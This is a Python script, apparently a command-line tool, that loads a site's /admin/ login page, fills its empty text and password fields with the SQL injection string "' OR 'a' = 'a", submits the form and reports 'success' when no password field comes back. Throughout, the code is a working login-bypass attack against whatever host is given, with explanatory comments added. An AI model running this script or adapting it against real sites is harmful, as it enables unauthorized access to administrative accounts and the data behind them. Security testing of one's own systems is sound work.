  1. #!/usr/bin/python3
  2.  
  3. import requests
  4. from bs4 import BeautifulSoup
  5. import sys
  6.  
# Probe value that gen_user_data() substitutes into every named <input> of
# the login form that has no value and whose type is absent, empty, "text"
# or "password".  The commented alternative below is a benign placeholder
# that exercises the same code path with an ordinary string.
PSWD = "' OR 'a' = 'a"
#PSWD = '1'
def format_host(host):
    """Reduce *host* to a bare host string.

    Surrounding whitespace is trimmed, a leading ``scheme://`` is dropped,
    and everything from the first ``/`` onward is cut off.  Nothing else in
    this script calls it.
    """
    cleaned = host.strip()
    head, sep, tail = cleaned.partition('://')
    # Keep the part after the scheme separator when one is present,
    # otherwise the whole (already stripped) string.
    cleaned = tail if sep else head
    # Anything after the first slash is path, not host.
    return cleaned.split('/', 1)[0]
  19.  
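def create_headers(host):
    """Return a fresh dict of fixed, browser-like request headers.

    *host* is accepted for call-site compatibility only: the result never
    depended on it.  (The original trimmed an ``http://`` / ``https://``
    prefix from *host* and then discarded the result; that dead code is
    removed here.)

    Args:
        host: ignored.

    Returns:
        A new dict on every call, so callers may mutate it safely.
    """
    return {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.8,ka;q=0.6',
        'Cache-Control': 'max-age=0',
        'Connection': 'keep-alive',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36',
        'Upgrade-Insecure-Requests': '1',
    }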
  27.  
def get_form(host: str):
    """Fetch ``<host>/admin/`` and return the largest ``<form>`` on that page.

    A throw-away ``requests.Session`` is used for the GET, so any cookie the
    server sets here is not carried into the POST made later by ``run()``.
    ``filtered`` is populated with the POST forms, but the selection at the
    end ignores it and picks from ``forms`` by length, so the method check
    has no effect on the result.  ``max()`` raises ``ValueError`` when the
    page contains no form at all.
    """
    url = host + '/admin/'
    s = requests.Session()
    resp = s.get(url, headers = create_headers(host))
    # print(resp.content)
    # No parser is named, so bs4 chooses one itself (newer versions warn).
    soap = BeautifulSoup(resp.content)
    forms = soap.find_all('form');
    filtered = []
    for f in forms:
        # A single form is accepted as-is, without looking at its method.
        if len(forms) == 1:
            break
        attr = f.attrs.get('method')
        if attr != 'post' and attr != 'POST':
            continue
        filtered.append(f)

    # key=len: for a bs4 Tag this is the number of direct children, i.e. the
    # form with the most child nodes wins.
    form = max(forms, key=len)
    return form
  46.  
def get_action(form):
    """Return the form's ``action`` attribute.

    When the attribute is missing or empty, two diagnostic lines are
    printed and the script terminates with status 0.
    """
    action = form.attrs.get('action')
    if action:
        return action
    print('get action')
    print('unknown')
    exit(0)
  54.  
def gen_user_data(form) -> dict:
    """Build the POST body for *form* from its ``<input>`` elements.

    Every named input is included.  Inputs that already carry a non-empty
    ``value`` keep it; inputs with no value whose ``type`` is absent, empty,
    ``text`` or ``password`` are filled with ``PSWD``.  Inputs of any other
    type that have no value are stored with ``None``.

    Returns:
        dict mapping input name to the value to submit.
    """
    inputs = form.find_all('input')
    res = {}
    for inp in inputs:
        name = inp.attrs.get('name')
        # Unnamed inputs are skipped, as a browser would leave them out too.
        if not name:
            continue
        val = inp.attrs.get('value')
        # Assigned first (possibly None) so the field is present even when
        # it is not overwritten below.
        res[name] = val
        if val and len(val) > 0:
            continue
        tp = inp.attrs.get('type')
        if tp and len(tp) > 0 and tp != 'text' and tp != 'password':
            continue
        res[name] = PSWD
    return res
  71.  
  72.  
def run(host: str) -> None:
    """Submit the login form found at ``<host>/admin/`` and print a verdict.

    Traffic shape, for anyone reviewing server logs: one GET to ``/admin/``
    (inside ``get_form``), then one POST to the form's action from a second
    ``requests.Session`` -- so cookies set by the GET are not replayed --
    carrying the header set from ``create_headers`` and the body from
    ``gen_user_data``.  The verdict is a heuristic: the response body is
    printed and ``'success'`` is reported only when it no longer contains a
    password input.
    """
    # Raises IndexError on an empty host string.
    if host[len(host) - 1] == '/':
        host = host[:-1]
    if host.find('http://') == -1 and host.find('https://') == -1:
        host = 'http://' + host
    form = get_form(host);
    action = get_action(form)
    # print(form)
    # Result discarded here; it is recomputed below.
    gen_user_data(form)
    # exit()
    # Relative actions are placed under /admin/ by plain concatenation (no
    # URL joining); absolute http(s) actions are used verbatim.
    url = host + '/admin/' + action
    if action[0:7] == 'http://' or action[0:8] == 'https://':
        url = action

    s = requests.Session()
    login_url = url
    userdata = gen_user_data(form)
    headers = create_headers(host)
    res = s.post(login_url, data=userdata, headers=headers)
    # Any 4xx/5xx ends the run with 'failure' and no further output.
    if res.status_code >= 400:
        print('failure')
        exit()
    # print(res.content)
    # print(res.content)
    # print(res.cookies)
    # print(dir(res))
    # print(res.url)
    # print(res.status_code)
    # 'latin' is an alias of ISO-8859-1: every byte decodes, so this never
    # raises, but non-Latin text will be mangled in the printed body.
    content = res.content.decode('latin')
    print(res.url)
    print(content)
    # Heuristic verdict: a password field still present in the response is
    # read as "login form shown again".
    if content.find('type="password"') != -1 or content.find("type='password'") != -1:
        print('failure')
    else:
        print('success')
  108.  
if __name__ == '__main__':
    # One positional argument is required: the host to contact.
    argv = sys.argv
    if len(argv) > 1:
        run(argv[1])
    else:
        print('Usage: %s host' % argv[0])
        exit(0)